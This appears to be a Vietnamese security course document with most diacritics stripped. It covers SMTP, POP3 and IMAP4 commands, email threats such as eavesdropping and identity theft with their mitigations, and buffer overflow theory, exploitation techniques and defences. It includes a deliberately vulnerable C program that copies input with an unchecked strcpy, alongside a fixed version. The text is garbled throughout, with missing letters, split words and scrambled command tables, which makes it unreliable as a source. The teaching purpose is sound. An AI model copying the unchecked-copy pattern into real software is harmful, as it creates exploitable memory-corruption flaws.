th c mt hoc nhiu account. Mi account u c mang mt tn khc nhau (user). Mi
6, 2012
account u c mt hp th ring (mailbox) cho account . Thng thng th tn ca hp th

s ging nh tn ca account. Ngoi ra my vi tnh phi c ni trc tip hoc gin tip vi
h thng Internet nu mun gi nhn th in t ton cu. Ngi s dng my vi tnh ti nh
vn c th gi nhn th in t bng cch kt ni my vi tnh ca h vi mt my vi tnh khc
bng modem. C mt s ni cp pht account th in t min ph cho cc my vi tnh ti nh
c th dng modem kt ni vi my vi tnh chuyn nhn th in t nh hotmail.com
hoc yahoo.com .v.v. Ngoi ra, cn c rt nhiu c quan thng mi cung cp dch v hoc
account cho my vi tnh ti nh nhng ngi s dng phi tr tin dch v hng thng.
ng i ca th
Th in t chuyn t my my ch th in t ny (mail server) ti my ch t in t khc
trn internet. Khi th c chuyn n ch th n c cha ti hp th in t ti my ch
th in t cho n khi n c nhn bi ngi nhn. Ton b qu trnh x l ch xy ra trong
vi pht, do n cho php nhanh chng lin lc vi mi ngi trn ton th gii mt cnh
nhanh chng ti bt c thi im no d ngy hay m.
Gi, nhn v chuyn th
nhn c th in t bn cn phi c mt ti khon (account) th in t. Ngha l bn
phi c mt a ch nhn th. Mt trong nhng thun li hn vi th thng thng l bn c
th nhn th in t t bt c u. Bn ch cn kt ni vo Server th in t ly th v my
tnh ca mnh. gi c th bn cn phi c mt kt ni vo internet v truy nhp vo my
ch th in t chuyn th i. Th tc tiu chun c s dng gi th l SMTP (Simple
Mail Transfer Protocol). N c kt hp vi th tc POP (Post Office Protocol) v IMAP
ly th.
M hnh ca h thng my ch th in t:
6, 2012
Vi mt h thng my ch th in t cung cp cho mt n v va v nh th ton b h

thng thng c tch hp vo mt my ch. V my ch va lm chc nng nhn, gi
th, lu tr hp th v kim sot th vo ra.
- S dng th tc SMTP chuyn, nhn th gia cc my ch th vi nhau.
- S dng th tc SMTP cho php mail client gi th ln my ch.
- S dng th tc POP hoc IMAP n mail client nhn th v.
a.2 Gii thiu v giao thc SMTP
Gii thiu
Mc tiu ca SMTP l chuyn truyn email tin cy v hiu qu. SMTP khng ph thuc h
thng con v ch yu cu 1 knh truyn d liu ng tin cy. Mt tnh nng quan trng ca
SMTP ca n l kh nng relay(chuyn tip) mail qua mi trng dch v truyn thng. Mt
dch v truyn thng cung cp mt mi trng truyn thng gia cc tin trnh (IPCE). Mt
IPCE c th bao gm mt mng, mt s mng, hay mt h thng mng con. C th hiu IPCE l
mi trng cho php mt tin trnh c th giao tip qua li trc tip vi mt tin trnh khc. iu
quan trng l cc IPCE khng ch c quan h 1-1 trn cc mng. Mt tin trnh c th giao tip
trc tip vi nhiu tin trnh khc thng qua IPCE. Mail l mt ng dng ca truyn thng lin
tin trnh. Mail c th c truyn ti gia cc tin trnh trn nhiu IPCEs khc nhau 1 tin trnh
c kt ni gia hai (hay nhiu) IPCE. C th hn, email c th c chuyn tip (relay) qua
nhiu Host trn cc h thng chuyn ti khc nhau qua cc Host trung gian.
M hnh SMTP
Cc SMTP c thit k da trn cc m hnh truyn thng sau:
- Khi c cc yu cu mail t ngi s dng, pha SMTP-send s thit lp mt knh truyn
hai chiu ti pha SMTP-receiver
- SMTP-receiver y c th l ch n cui cng hay ch l mt a ch trung gian.
- SMTP-send gi SMTP commands n SMTP-receiver.
- SMTP-receiver p ng SMTP commands bng cch gi tr cho SMTP send cc SMPT replies
tng ng
Mt khi knh truyn c thit lp, SMTP-sender s gi mt MAIL command cho bit
ngi gi. Nu SMTP-receiver chp nhn mail n s p ng 1 OK reply. Sau SMTPsender li gi mt RCPT command cho bit l ngi s nhn mail, nu SMTP-receiver chp
nhn mail ny cho ngi nhn th n reply li l OK, nu khng n s reply li l mail
ny b loi b. Nu SMTP-receiver reply l OK th SMTP-sender s gi d liu mail ti pha
nhn v kt thc bng mt command c bit no . Nu SMTP-receiver x l thnh cng
d liu mail ny th n s reply li l OK.
6, 2012
- SMTP cung cp nhiu k thut cch khc nhau gi mail:

o Truyn thng khi host pha gi v host pha nhn c kt ni ti cng mt dch v truyn
ti.
oThng qua cc my ch SMTP khi host pha gi v host pha nhn khng c kt ni ti
cng mt dch v truyn ti.i s cho mail command l 1 tuyn ngc (reverse-path),
trong ghi r mail c gi t ai. i s cho RCPT command l mt tuyn chuyn tip
(forward-path), ch ra mail c gi cho ai. Tuyn chuyn tip l 1tuyn ngun, trong khi
cc tuyn ngc l 1 tuyn quay tr (c th c dng tr li mt thng bo cho ngi
gi khi mt li xy ra vi mt message chuyn tip).
Khi cng mt message c gi n nhiu ngi nhn, SMTP khuyn khch vic truyn ti
ch c mt bn sao ca cc d liu cho tt c cc ngi nhn ti cng mt my ch ch.
Cc mail command v reply c mt c php cng nhc. Cc reply cng c 1 m s. Trong
phn sau y, m xut hin cc v d thc t s dng cc mail command v reply, cc danh
sch y cc command v reply.
Cc command v reply khng phi l trng hp nhy cm. Tc l, mt t command hoc reply
c th l ch thng, hoa, hay hn hp. Lu rng iu ny l khng ng vi tn ngi s
dng hp th. V i vi mt s my tn ngi s dng l trng hp nhy cm, v cc trin
khai SMTP phi a trng hp ny ra bo v cc trng hp tn ngi dng ging vi cc
tham s trong mailbox. Tn my ch khng phi l trng hp nhy cm. Cc command v reply
l gm cc k t ASCII. Khi dch v chuyn th cung
cp 1 knh truyn 1 byte 8bit (octet), mi k t 7 bit c a vo cc bit thp ca octet, bit
cao ca octet xa v 0.
Khi c th ha cc dng chung ca mi lnh v reply, 1 i s s c biu din bng 1
bin(hay 1 hng) trong ngn ng meta , chng hn, <string> hoc <reverse-path>
Khi xc nh cc hnh thc chung ca mt lnh hoc tr li, mt i s. y cc du <
cho bit y l bin trong ngn ng meta.
6, 2012
MIME v SMTP
MIME (Multipurpose Internet Mail Extensions) cung cp thm kh nng cho SMTP v
cho php cc file c dng m ho multimedia i km vi bc in SMTP chun. MIME
s dng bng m Base64 chuyn cc file dng phc tp sang m ASCII chuyn i.
MIME l mt tiu chun mi nh n hin c h tr bi hu ht cc ng dng, v bn
phi thay i nu chng trnh th in t ca bn khng c h tr MIME. MIME c
quy chun trong cc tiu chun RFC 2045-2049.
S/MIME
L mt chun mi ca MIME cho php h tr cho cc bc in c m ho. S/MIME da
trn k thut m cng cng RSA v gip cho bc in khng b xem trm hoc chn ly.ho
Lnh ca SMTP
Mt cch n gin SMTP s dng cc cu lnh ngn iu khin bc in. Bng di
l danh sch cc lnh ca SMTP. Cc lnh ca SMTP c xc nh trong tiu chun RFC
821.
HELO
MAIL
RCPT
DATA
RSET
VRFY
NOOP
QUIT
SEND
Hello. S dng xc nh ngi gi in. Lnh ny

ny i km vi tn ca host gi in. Trong ESTMP
(extended protocol), th lnh ny s l EHLO.
Khi to mt giao dch gi th. N kt hp "from" xc
nh ngi gi th.
Xc nh ngi nhn th.
Thng bo bt u ni dung thc s ca bc in (phn
thn ca th). D liu c m thnh dng m 128-bit
ASCII v n c kt thc vi mt dng n cha du
Hu b giao dch th
chm (.).
S dng xc thc ngi nhn th.
N l lnh "no operation" xc nh khng thc hin hnh
ng g
Thot khi tin trnh kt thc
Cho host nhn bit rng th cn phi gi n u cui khc.
SMTP m rng (Extend ed SMTP)

SMTP th c ci thit ngy cng p ng nhu cu cao ca ngi dng v l mt th
tc ngy cng c ch. Nh d sao cng cn c s m rng tiu chun SMTP v chun
RFC 1869 ra i b xung cho SMTP. N khng ch m rng m cn cung cp thm
cc tnh nng cn thit cho cc lnh c sn. V d: lnh SIZE l lnh m rng cho php
nhn gii hn ln ca bc in n. Khng c ESMTP th s khng gii hn c
6, 2012
ln ca bc th Khi h thng kt ni vi mt MTA, n s s dng khi to th ESMTP

thay HELO bng EHLO. Nu MTA c h tr SMTP m rng (ESMTP) th n s tr li vi
mt danh sch cc lnh m n s h tr. Nu khng n s tr li vi m lnh sai (500
Command not recognized) v host gi s quay tr v s dng SMTP. Sau y l mt tin
trnh ESMTP:
220 esmtpdomain.com
Server ESMTP Sendmail 8.8.8+Sun/8.8.8; Thu, 22 Jul 1999 09:43:01
EHLO host.sendingdomain.com
250-mail.esmtpdomain.com Hello host, pleased to meet you
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP QUIT
221 Goodbye host.sendingdomain.com
SMTP Headers
C th ly c rt nhiu thng tin c ch bng cch kim tra phn header ca th.
Khng ch xem c bc in t u n, ch ca th, ngy gi v nhng ngi
nhn. Bn cn c th xem c nhng im m bc in i qua trc khi n c
hp th ca bn. Tiu chun RFC 822 qu y nh header cha nhng g. Ti thiu c
ngi gi (from), ngy gi v ngi nhn (TO, CC, hoc BCC)
6, 2012
Header ca th khi nhn c cho php bn xem bc in i qua nhng u trc khi
n hp th ca bn. N l mt dng c rt tt kim tra v gii quyt li. Sau y l
v d:
From someone@mydomain.COM Sat Jul 31 11:33:00 1999
Received:
from
host1.mydomain.com
by
host2.mydomain.com
(8.8.8+Sun/8.8.8)
with ESMTP id LAA21968 for ;
Sat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.mydomain.com with Interne Mail Service
(5.0.1460.8)
id ; Sat, 31 Jul 1999 11:34:39 -0400 Message-ID:
From: "Your Friend"
To: "'jamisonn@host2.mydomain.com'" Subject: Hello
There
Date: Sat, 31 Jul 1999 11:34:36 -0400
Trn v d trn c th thy bc in c gi i t someone@m ydomain.com. T
mydomain.com, n c chuyn n host1. Bc in c gi t host2 ti host1 v
chuyn ti ngi dng. Mi ch bc in dng li th host nhn c yu cu in thm
thng tin vo header n bao gm ngy gi tm dng . Host2 thng bo rngn
nhn c in lc11:33:00. Host1 thng bo rng n nhn c bc in vo lc
11:34:36, S trn lch hn mt pht c kh nng l do s khng ng b gia ng h
ca hai ni.
Thun li v bt li ca SMTP
Nh th tc X.400, SMTP c mt s thun li v bt li
Thun li bao gm:
SMTP rt ph bin.
N c h tr bi nhiu t chc.
SMTP c gi thnh qun tr v duy tr thp.
SMTP n c cu trc a ch n gin.
Bt li bao gm:
SMTP thiu mt s chc nng
SMTP thit kh nng bo mt nh X.400.
6, 2012
N ch gii hn vo nhng tnh nng n gin nht

a.3 Gii thiu v giao thc POP
IMAP
Trong nhng ngy thng u tin ca th in t, ngi dng c yu cu truy nhp

v my ch th in t v c cc bc in ca h . Cc chng trnh th
thng s dng dng text v thiu kh nng thn thin vi ngi dng. gii quyt vn
mt s th tc c pht trin cho php ngi dng c th ly th v my ca h
hoc c cc giao din s dng thn thin hn vi ngi dng. V chnh iu em n s
ph bin ca th in t.C hai th tc c s dng ph bin nht hin ny l POP
(Post Office Protocol)v IMAP (Internet Mail Access Protocol).
Post Office Protocol (POP)POP cho php ngi dng c account ti my ch th in t kt
ni vo MTA v ly th v my tnh ca mnh, c th c v tr li li. POP c pht
trin u tin l vo nm 1984 v c nng cp t bn POP2 ln POP3 vo nm 1988. V
hin nay hu ht ngi dng s dng tiu chun POP3
POP3 kt ni trn nn TCP/IP n my ch th in t (s dng cng 110). Ngi dng
in username v password. Sau khi xc thc u client s s dng cc lnh ca POP3 ly
hoc xo th.
POP3 ch l th tc ly th trn my ch th in t. POP3 c quy nh bi tiu chun
RFC 1939.
Lnh ca POP3
Lnh
Miu t
USER
Xc nh username
PASS
Xc nh password
STAT
Yu cu v trng thi ca hp th nh s
lng th v ln ca th LIST Hin danh sch ca th

RETR Nhn th
DELE
Xo mt bc th xc nh
NOOP
Khng lm g c
RSET
Khi phc li nh th xo (rollback)
QUIT
Thc hin vic thay i v thot ra
6, 2012
Internet Mail Access Protocol (IMAP)

Th tc POP3 l mt th tc rt c ch v s dng rt n gin ly th v cho ngi
dng. Nh s n gin cng em n vic thiu mt s cng dng cn thit. V d:
POP3 ch l vic vi ch offline c ngha l th c ly v s b xo trn server. IMAP
th h tr nhng thiu st ca POP3. IMAP c pht trin vo nm 1986 bi trng i
hc Stanford. IMAP2 pht trin vo nm 1987. IMAP4, l bn mi nht ang c s
dng v n c cc t chc tiu chun Internet chp nhn vo nm 1994. IMAP4
c quy nh bi tiu chun RFC 2060 v n s dng cng 143 ca TCP.
Lnh ca IMAP4
Lnh
Miu t
CAPABILITY
Yu cu danh sch cc chc nng h tr
AUTHENTICA Xc nh s dng xc thc t mt server

khc cp username v password
TE
Cung
LOGIN
SELECT
Chn hp th
EXAMINE
in hp th ch c php c
CREATE
To hp th
DELETE
Xo hp th
Lnh
Miu t
i tn hp th
RENAME
SUBSCRIBE
Thm vo mt list ang hot ng
UNSUBSCRIBE Di khi list ang hot ng

LIST
Danh sch hp th
6, 2012
LSUB
Hin danh sch ngi s dng hp th STATUS

Trng thi ca h th (s lng th,...) APPEND
Thm
message vo hp th
CHECK
Yu cu kim tra hp th
CLOSE
EXPUNGE
SEARCH
Thc hin xo v thot khi hp th

Thc hin xo
Tm kim trong hp th tm messages xc
nh
FETCH
Tm kim trong ni dung ca message
STORE
Thay i ni dng ca messages COPY
Copy message sang hp th khc

NOOP
LOGOUT
Khng lm g
ng kt ni
So snh POP3 v IMAP4

C rt nhiu im khc nhau gia POP3 v IMAP4. Ph thuc vo ngi dng, MTA, v s
cn thit , C th s dng POP3, IMAP4 hoc c hai.
Li ch ca POP3 l :
Rt n gin.
c h tr rt rng
Bi rt n gin nn, POP3 c rt nhiu gii hn. V d n ch h tr s dng mt hp th v
th s c xo khi my ch th in t khi ly v.
IMAP4 c nhng li ch khc:
H tr xc thc rt mnh
6, 2012
H tr s dng nhiu hp th
c bit h tr cho cc ch vic lm vic online, offline, hoc khng kt ni IMAP4
ch online th h tr cho vic ly tp hp cc th t my ch, tm kim v l y message
cn tm v ...IMAP4 cng cho php ngi dng chuyn th t th mc ny ca my ch
sang th mc khc hoc xo th. IMAP4 h tr rt tt cho ngi dng hay phi di chuyn
v phi s dng cc my tnh khc nhau.
b. Cc nguy c b tn cng khi s dng Email
b.1 S thiu bo mt trong h thng
email
Webmail: nu kt ni ti Webmail Server l khng an ton (v d a ch l http:// vkhng
phi l https://), lc mi thng tin bao gm Username v pasword khng c m ha
khi n t Webmail Server ti my tnh.
SMTP: SMTP khng m ha thng ip. Mi kt ni gia SMTP servers gi thng
ip ca bn di dng ch cho mi k nghe trm thy. Thm vo , nu email server
yu cu bn gi username v password login vo SMTP server mc ch
chuyn thng ip ti mt server khc, khi tt c u c gi di dng ch, mc
tiu nghe trm. Cui cng, thng ip gi bng SMTP bao gm thng tin v m y
tnh m chng c gi i, v chng trnh email c s dng. Nhng thng tin
ny sn sng cho mi ngi nhn, c th mang tnh cht c nhn.
POP v IMAP: Giao thc POP v IMAP yu cu bn gi username v password login,
u khng c m ha. V vy, thng ip ca bn c th c c bi bt k k no ang
nghe ln thng tin ca my tnh cng nh nh cung cp dch v email ca bn.
Backups: thng ip c lu tr trn SMTP server di dng ch, khng c
m ha.Vic Sao lu d liu trn server c th c thc hin bt c lc no v ngi
qun tr c th c bt k d liu no trn my tnh.
b.2 Cc nguy c trong qu trnh gi email
Eavesdropping:
Internet l ni rng ln vi rt nhiu ngi. Tht d dng ai truy cp vo my tnh hoc
on mng m thng tin ca bn ang c truyn trn , bt thng tin v c. Ging nh ai
ang phng k bn ang lng nghe cuc ni chuyn in thoi ca bn, hacker c th s
dng cc cng c man-in-the-middle bt ton b cc gi tin t ngi s dng email. Vic ny
c th c thc hin mt cch d dng thng qua cc chng trnh nh Cain&Abel, Ettercap...
6, 2012
Khc phc Eavesdropping:

- Do trnh tnh trng eavesdropping xy ra, chng ta nn m ha cc thng tin khi chng
c chuyn i trn mng internet n server Mail. V ngay trn server, thng tin cng cn
phi c m ha lu tr 1 cch an ton s dng kha bo mt m ch c ngi nhn ch
thc mi bit.
Identify Theft:
Nu ai c th thu thp username v password m bn dng truy cp vo email server,
h c th c mail ca bn v gi mail nh bn. Thng thng, nhng thng tin ny c th
thu thp bi k nghe ln trn SMTP, POP, IMAP hoc kt ni WebMail, bng cch c
thng ip m bn nh km theo cc thng tin ny.
Khc phc Identify Theft:
- c th khc phc identity theft, chng ta cn phi to ra c 1 s trao i ring t, b
mt v an ton bng cch gi nhng thng tin c nhn v ni dung tin nhn di dng m ha
khi chng di chuyn trn internet.
VD: MyMail s dng cc ng link giao tip Secure Socket Protocol gim tnh trng
indentify Theft xy ra.
Invasion of Privacy:
Nu bn rt quan tm n thng tin ring t ca mnh, bn cn xem xt kh nng vic sao lu
ca bn khng c bo v .
Bn c th cng quan tm n vic nhng ngi khc c kh nng bit c a ch IP ca
my tnh bn. Thng tin ny c th c dng nhn ra thnh ph bn ang sng hoc
thm ch trong trng hp no c th tm ra a ch ca bn. Vic ny khng xy ra vi
WebMail, POP, IMAP, nhng i vi SMTP th li c kh nng xy ra.
Khc phc invasion of Privacy:
- Tt c cc thng tin s c bo mt bng cch m ha bng kha b mt ri lu tr, c
th c c mail, ngi nhn cn phi nh chnh xc username v password ca mnh.
6, 2012
- Du a ch IP trong phn header message, iu ny s gip bo v nhng thng tin c nhn

nh a ch thnh ph, tiu bang m bn ang sng.
- M ha tt c ni dung email lu tr v cng m ha khi cn truyn.
Message Modification:
Bt c ngi no c quyn admin trn bt k server SMTP no m thng ip ca bn n,
th khng ch c th c thng ip ca bn, m h cn c th xa hay thay i thng ip
trc khi n tip tc i n ch. Ngi nhn ca bn s khng th bit thng ip ca bn c
b thay i hay khng? Nu thng ip b xa i mt th h cng khng th bit rng c thng
ip c gi cho h.
Khc phc Message Modification:
- Khi email c gi n server mail th n cn lu tr di dng m ha bng 1 kha bo
mt ring, khi d cho ai c quyn admin trn server, h vn khng th thay i c ni
dung email.
- Thm na chng ta cng phi ngn chn khng cho System administrator c quyn truy sut ti
khan email bng cch n gin reset v to ra 1 password mi.
4. Bo mt truy cp t xa
Phn ny trnh by trong mc 2 ca ti liu v Network Infrastructure Security.
5. L hng bo mt Buffer overflow v cch phng chng
a. L thuyt
Trong cc lnh vc an ninh my tnh v lp trnh, mt li trn b nh m hay gi tt l li
trn b m l mt li lp trnh c th gy ra mt ngoi l truy nhp b nh my tnh v
chng trnh b kt thc, hoc khi ngi dng c ph hoi, h c th li dng li ny ph
v an ninh h thng.
Li trn b m l mt iu kin bt thng khi mt tin trnh lu d liu vt ra ngoi bin
ca mt b nh m c chiu di c nh. Kt qu l d liu s ln cc v tr b nh lin
k.
D liu b ghi c th bao gm cc b nh m khc, cc bin v d liu iu khin lung
chy ca chng trnh (program flow control).
Cc li trn b m c th lm cho mt tin trnh v hoc cho ra cc kt qu sai. Cc li
ny c th c kch hot bi cc d liu vo c thit k c bit thc thi cc on m
ph hoi hoc lm cho chng trnh hot ng mt cch khng nh mong i. Bng cch
, cc li trn b m gy ra nhiu l hng bo mt (vulnerability) i vi phn mm v to
6, 2012
c s cho nhiu th thut khai thc (exploit). Vic kim tra bin (bounds checking) y bi
lp trnh vin hoc trnh bin dch c th ngn chn cc li trn b m.
b. M t k thut
Mt li trn b nh m xy ra khi d liu c vit vo mt b nh m, m do khng kim
tra bin y nn ghi ln vng b nh lin k v lm hng cc gi tr d liu ti cc
a ch b nh k vi vng b nh m . Hin tng ny hay xy ra nht khi sao chp mt
xu k t t mt b nh m ny sang mt vng b nh m khc.
c. V d c bn
Trong v d sau, mt chng trnh nh ngha hai phn t d liu k nhau trong b nh: A l
mt b nh m xu k t di 8 bytes, v B l mt s nguyn kch thc 2 byte. Ban u, A
ch cha ton cc byte gi tr 0, cn B cha gi tr 3. Cc k t c kch thc 1 byte. By gi,
chng trnh ghi mt xu k t "excessive" vo b m A, theo sau l mt byte 0 nh du
kt thc xu. V khng kim tra di xu, nn xu k t mi ln gi tr ca B:
Tuy lp trnh vin khng c nh sa i B, nhng gi tr ca B b thay th bi mt s
c to nn t phn cui ca xu k t. Trong v d ny, trn mt h thng big-endian s
dng m ASCII, k t "e" v tip theo l mt byte 0 s tr thnh s 25856.
Nu B l phn t d liu duy nht cn li trong s cc bin c chng trnh nh ngha,
vic vit mt xu k t di hn na v vt qu phn cui ca B s c th gy ra mt li
chng hn nh segmentation fault (li phn on) v tin trnh s kt thc.
d. Trn b nh m trn stack
Bn cnh vic sa i cc bin khng lin quan, hin tng trn b m cn thng b li
dng (khai thc) bi tin tc lm cho mt chng trnh ang chy thc thi mt on m ty
c cung cp. Cc k thut mt tin tc chim quyn iu khin mt tin trnh ty theo
vng b nh m b m c t ti . V d, vng b nh stack, ni d liu c th c
tm thi "y" xung "nh" ngn xp (push), v sau c "nhc ra" (pop) c gi tr
ca bin. Thng thng, khi mt hm (function) bt u thc thi, cc phn t d liu tm thi
(cc bin a phng) c y vo, v chng trnh c th truy nhp n cc d liu ny
trong sut thi gian chy hm . Khng ch c hin tng trn stack (stack overflow) m cn
c c trn heap (heap overflow).
Trong v d sau, "X" l d liu tng nm ti stack khi chng trnh bt u thc thi; sau
chng trnh gi hm "Y", hm ny i hi mt lng nh b nh cho ring mnh; v sau
"Y" gi hm "Z", "Z" i hi mt b nh m ln:
Nu hm "Z" gy trn b nh m, n c th ghi d liu thuc v hm Y hay chng trnh
chnh:
iu ny c bit nghim trng i vi hu ht cc h thng. Ngoi cc d liu thng, b
nh stack cn lu gi a ch tr v, ngha l v tr ca phn chng trnh ang chy trc khi
hm hin ti c gi. Khi hm kt thc, vng b nh tm thi s c ly ra khi stack, v
6, 2012
thc thi c trao li cho a ch tr v. Nh vy, nu a ch tr v b ghi bi mt li

trn b m, n s tr ti mt v tr no khc. Trong trng hp mt hin tng trn b
m khng c ch nh trong v d u tin, hu nh chc chn rng v tr s l mt v tr
khng hp l, khng cha mt lnh no ca chng trnh, v tin trnh s v. Tuy nhin,
mt k tn cng c th chnh a ch tr v tr ti mt v tr ty sao cho n c th lm tn
hi an hinh h thng.
e. M ngun v d
M ngun C di y th hin mt li lp trnh thng gp. Sau khi c bin dch, chng
trnh s to ra mt li trn b m nu n c gi vi mt tham s dng lnh l mt xu k t
qu di, v tham s ny c dng ghi vo mt b nh m m khng kim tra di ca
n.
************
/* overflow.c - demonstrates a buffer overflow */
#include
#include
int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strcpy(buffer, argv[1]);
return 0;
}
************
Cc xu k t di khng qu 9 s khng gy trn b m. Cc xu k t gm t 10 k t
tr ln s gy trn b m: hin tng ny lun lun l mt li sai nhng khng phi lc no
cng gy ra vic chng trnh chy sai hay gy li segmentation faults
Chng trnh trn c th c vit li cho an ton bng cch s dng hm strncpy nh sau:
********
/* better.c - demonstrates one method of fixing the problem */
#include
#include
int main(int argc, char *argv[])
{
char buffer[10];
6, 2012
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strncpy(buffer, argv[1], sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
return 0;
}
*******
f. Khai thc
C cc k thut khc nhau cho vic khai thc li trn b nh m, ty theo kin trc my tnh,
h iu hnh v vng b nh. V d, khai thc ti heap (dng cho cc bin cp pht ng) rt
khc vi vic khai thc cc bin ti stack.
Khai thc li trn b m trn stack
Mt ngi dng tho k thut v c xu c th khai thc cc li trn b m trn stack
thao tng chng trnh theo mt trong cc cch sau: Ghi mt bin a phng nm gn b
nh m trong stack thay i hnh vi ca chng trnh nhm to thun li cho k tn cng.
Ghi a ch tr v trong mt khung stack (stack frame). Khi hm tr v, thc thi s c
tip tc ti a ch m k tn cng ch r, thng l ti mt b m cha d liu vo ca
ngi dng.
Nu khng bit a ch ca phn d liu ngi dng cung cp, nhng bit rng a ch ca n
c lu trong mt thanh ghi, th c th ghi ln a ch tr v mt gi tr l a ch ca mt
opcode m opcode ny s c tc dng lm cho thc thi nhy n phn d liu ngi dng. C
th, nu a ch on m c hi mun chy c ghi trong mt thanh ghi R, th mt lnh
nhy n v tr cha opcode cho mt lnh jump R, call R (hay mt lnh tng t vi hiu ng
nhy n a chi ghi trong R) s lm cho on m trong phn d liu ngi dng c thc
thi. C th tm thy a ch ca cc opcode hay cc byte thch hp trong b nh ti cc th
vin lin kt ng (DLL) hay trong chnh file thc thi. Tuy nhin, a ch ca opcode
thng khng c cha mt k t null (hay byte 0) no, v a ch ca cc opcode ny c
th khc nhau ty theo cc ng dng v cc phin bn ca h iu hnh.D n Metapoloit l
mt trong cc c s d liu cha cc opcode thch hp, tuy rng trong ch lit k cc
opcode trong h iu hnh Microsoft Windows.
Khai thc li trn b m trn heap
Mt hin tng trn b m xy ra trong khu vc d liu heap c gi l mt hin tng
trn heap v c th khai thc c bng cc k thut khc vi cc li trn stack. B nh heap
c cp pht ng bi cc ng dng ti thi gian chy v thng cha d liu ca chng
trnh. Vic khai thc c thc hin bng cch ph d liu ny theo cc cch c bit lm
6, 2012
cho ng dng ghi ln cc cu trc d liu ni b chng hn cc con tr ca danh sch lin
kt. L hng ca Microsoft JPG GDI+l mt v d gn y v s nguy him m mt li trn
heap.
Cn tr i vi cc th thut khai thc
Vic x l b m trc khi c hay thc thi n c th lm tht bi cc c gng khai thc li
trn b m. Cc x l ny c th gim bt mi e da ca vic khai thc li, nhng c th
khng ngn chn c mt cch tuyt i. Vic x l c th bao gm: chuyn t ch hoa
thnh ch thng, loi b cc k t t bit (metacharacters) v lc cc xu khng cha k t l
ch s hoc ch ci. Tuy nhin, c cc k thut trnh vic lc v x l ny;
alphanumeric code (m gm ton ch v s), polymorphic code (m a hnh), Self-modifying
code (m t sa i) v tn cng kiu return-to-libc.. Cng chnh cc phng php ny c th
c dng trnh b pht hin bi cc h thng pht hin thm nhp (Intrusion detection
system).
g. Chng trn b m
Nhiu k thut a dng vi nhiu u nhc im c s dng pht hin hoc ngn
chn hin tng trn b m. Cch ng tin cy nht trnh hoc ngn chn trn b m l
s dng bo v t ng ti mc ngn ng lp trnh. Tuy nhin, loi bo v ny khng th p
dng cho m tha k (legacy code), v nhiu khi cc rng buc k thut, kinh doanh hay vn
ha li i hi s dng mt ngn ng khng an ton. Cc mc sau y m t cc la chn v
ci t hin c.
La chn ngn ng lp trnh
La chn v ngn ng lp trnh c th c mt nh hng ln i vi s xut hin ca li trn
b m. Nm 2006, C v C++ nm trong s cc ngn ng lp trnh thng dng nht, vi mt
lng khng l cc phn mm c vit bng hai ngn ng ny. C v C++ khng cung cp
sn cc c ch chng li vic truy nhp hoc ghi d liu ln bt c phn no ca b nh
thng qua cc con tr bt hp l; c th, hai ngn ng ny khng kim tra xem d liu c
ghi vo mt mng ci t ca mt b nh m) c nm trong bin ca mng hay khng.
Tuy nhin, cn lu rng cc th vin chun ca C++, th vin khun mu chun - STL,
cung cp nhiu cch an ton lu tr d liu trong b m, v cc lp trnh vin C cng c
th to v s dng cc tin ch tng t. Cng nh i vi cc tnh nng bt k khc ca C
hay C++, mi lp trnh vin phi t xc nh la chn xem h c mun chp nhn cc hn ch
v tc chng trnh thu li cc li ch tim nng ( an ton ca chng trnh) hay
khng.
Mt s bin th ca C, chng hn Cyclone, gip ngn chn hn na cc li trn b m bng
vic chng hn nh gn thng tin v kch thc mng vi cc mng. Ngn ng lp trnh D s
dng nhiu k thut a dng trnh gn ht vic s dng con tr v kim tra bin do ngi
dng xc nh.
6, 2012
Nhiu ngn ng lp trnh khc cung cp vic kim tra ti thi gian chy, vic kim tra ny gi
mt cnh bo hoc ngoi l khi C hoc C++ ghi d liu. V d v cc ngn ng ny rt a
dng, t pythol ti Ada, t Lisp ti Modula-2, v t Smalltalk ti OCaml. Cc mi trng
bytecode ca Java v .NET cng i hi kim tra bin i vi tt c cc mng. Gn nh tt c
cc ngn ng thng dch s bo v chng trnh trc cc hin tng trn b m bng cch
thng bo mt trng thi li nh r (well-defined error). Thng thng, khi mt ngn ng
cung cp thng tin v kiu thc hin kim tra bin, ngn ng thng cho php la
chn kch hot hay tt ch . Vic phn tch tnh (static analysis) c th loi c nhiu
kim tra kiu v bin ng, nhng cc ci t ti v cc trng hp ri rm c th gim ng
k hiu nng. Cc k s phn mm phi cn thn cn nhc gia cc ph tn cho an ton v
hiu nng khi quyt nh s s dng ngn ng no v cu hnh nh th no cho trnh bin
dch.
S dng cc th vin an ton
Vn trn b m thng gp trong C v C++ v cc ngn ng ny l cc chi tit biu
din mc thp ca cc b nh m vi vai tr cc ch cha cho cc kiu d liu. Do , phi
trnh trn b m bng cch gn gi tnh ng n cao cho cc phn m chng trnh thc
hin vic qun l b m. Vic s dng cc th vin c vit tt v c kim th, dnh
cho cc kiu d liu tru tng m cc th vin ny thc hin t ng vic qun l b nh,
trong c kim tra bin, c th lm gim s xut hin v nh hng ca cc hin tng trn
b m. Trong cc ngn ng ny, xu k t v mng l hai kiu d liu chnh m ti cc
hin tng trn b m thng xy ra; do , cc th vin ngn chn li trn b m ti cc
kiu d liu ny c th cung cp phn chnh ca s che chn cn thit. D vy, vic s dng
cc th vin an ton mt cch khng ng c th dn n trn b m v mt s l hng
khc; v tt nhin, mt li bt k trong chnh th vin chnh n cng l mt l hng. Cc ci
t th vin "an ton" gm The Better String Library, Arri Buffer API v Vstr. Th vin C
ca h iu hnh OpenBSD cung cp cc hm hu ch strlcpy strlcat nhng cc hm ny
nhiu hn ch hn nhiu so vi cc ci t th vin an ton y .
Thng 9 nm 2006, Bo co k thut s 24731 ca hi ng tiu chun C c cng b,
bo co ny m t mt tp cc hm mi da trn cc hm vo ra d liu v cc hm x l xu
k t ca th vin C chun, cc hm mi ny c b sung cc tham s v kch thc b
m.
Chng trn b nh m trn stack
Stack-smashing protection l k thut c dng pht hin cc hin tng trn b m ph
bin nht. K thut ny kim tra xem stack b sa i hay cha khi mt hm tr v. Nu
stack b sa , chng trnh kt thc bng mt li segmentation fault. Cc h thng s
dng k thut ny gm c Libsafe, StackGuard v cc bn v li (patch) Propolicy.
Ch Data Execution Prevention (cm thc thi d liu) ca Microsoft bo v thng cc con
